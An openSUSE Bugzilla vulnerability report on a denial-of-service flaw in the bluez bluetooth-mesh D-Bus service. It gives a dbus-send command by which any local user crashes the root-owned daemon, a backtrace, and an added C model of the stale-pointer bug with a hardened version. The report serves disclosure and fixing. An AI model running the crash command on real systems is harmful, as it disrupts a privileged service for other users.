http://bugzilla.suse.com/show_bug.cgi?id=1152672

Bug ID: 1152672
Summary: VUL-0: bluez: bluetooth-mesh D-Bus service can be crashed by regular user
Classification: openSUSE
Product: openSUSE Tumbleweed
Version: Current
Hardware: Other
OS: Other
Status: NEW
Severity: Normal
Priority: P5 - None
Component: Security
Assignee: seife@novell.slipkontur.de
Reporter: matthias.gerstner@suse.com
QA Contact: qa-bugs@suse.de
CC: matthias.gerstner@suse.com, vbotka@suse.com
Blocks: 1151518
Found By: ---
Blocker: ---

+++ This bug was initially created as a clone of Bug #1151518

The new bluetooth-mesh D-Bus service, which is under review in bug 1151518, has a DoS vulnerability that allows a regular user to crash the root-owned D-Bus service. The following D-Bus call can be used to do so:

    $ dbus-send --system --type=method_call --print-reply --dest=org.bluez.mesh \
        /org/bluez/mesh org.bluez.mesh.Network1.Join \
        objpath:/org/gnome/DisplayManager \
        array:byte:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

After a timeout of about 20 seconds the D-Bus service crashes due to a null pointer dereference, with the following backtrace:

    node_init_cb (node=0x0, agent=0x0) at mesh/mesh.c:359
    359         reply = dbus_error(join_pending->msg, MESH_ERROR_FAILED,
    (gdb) bt
        user_data=0x5555555be170) at mesh/node.c:1760
        dbus=<optimized out>) at ell/dbus.c:216
        user_data=0x5555555a6e00) at ell/dbus.c:279
        user_data=0x5555555a7ef0) at ell/io.c:126
        at ell/main.c:642
        at mesh/main.c:205

The reason is probably that the `join_pending` data structure has already been freed in a different function.
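The failure mode the report describes, modelled as an added C example (not bluez's own code): a Join() request stores pending state, the provisioning timeout frees it, and a callback that still assumes the state exists dereferences NULL. The struct layout, the enum, and the replay sequence are assumptions; only the names node_init_cb, join_pending and MESH_ERROR_FAILED come from the backtrace.

```c
#include <stdlib.h>

/* Simplified model of the pending-join state in mesh/mesh.c. Names follow the
 * bug report; the struct layout and flow are assumptions, not bluez code. */
struct join_data { const char *msg; };  /* msg: the saved D-Bus Join() request */
static struct join_data *join_pending;
enum cb_result { CB_NODE_READY = 0, CB_REPLIED_FAILED = 1, CB_STALE_JOIN = 2 };

/* Join() handler: keep the request so node_init_cb() can answer it later. */
static void join_start(const char *agent_path)
{
    join_pending = calloc(1, sizeof(*join_pending));
    join_pending->msg = agent_path;
}

/* Provisioning timeout (about 20 s in the daemon): the join is abandoned and
 * its state freed, but the callback is never told that it is gone. */
static void join_timeout(void)
{
    free(join_pending);
    join_pending = NULL;
}

/* Unchecked callback, as the backtrace suggests: reads join_pending->msg to
 * build the MESH_ERROR_FAILED reply; after join_timeout() that is a NULL deref. */
static enum cb_result node_init_cb_unchecked(void *node, void *agent)
{
    if (!node || !agent)
        return join_pending->msg ? CB_REPLIED_FAILED : CB_STALE_JOIN;
    return CB_NODE_READY;
}

/* Hardened callback: a join that was already torn down is reported as stale
 * and no reply is built from freed state. */
static enum cb_result node_init_cb_checked(void *node, void *agent)
{
    if (!join_pending)
        return CB_STALE_JOIN;
    if (!node || !agent)
        return CB_REPLIED_FAILED;  /* dbus_error(join_pending->msg, ...) here */
    return CB_NODE_READY;
}

/* Replays the report: Join with an agent path that never answers, the
 * timeout fires, then the callback arrives with node == agent == NULL. */
static enum cb_result replay_timeout_then_callback(int hardened)
{
    join_start("/org/gnome/DisplayManager");
    join_timeout();
    return hardened ? node_init_cb_checked(NULL, NULL) : node_init_cb_unchecked(NULL, NULL);
}
```

Calling replay_timeout_then_callback(0) reproduces the crash in-process, while the hardened path returns CB_STALE_JOIN and the daemon survives.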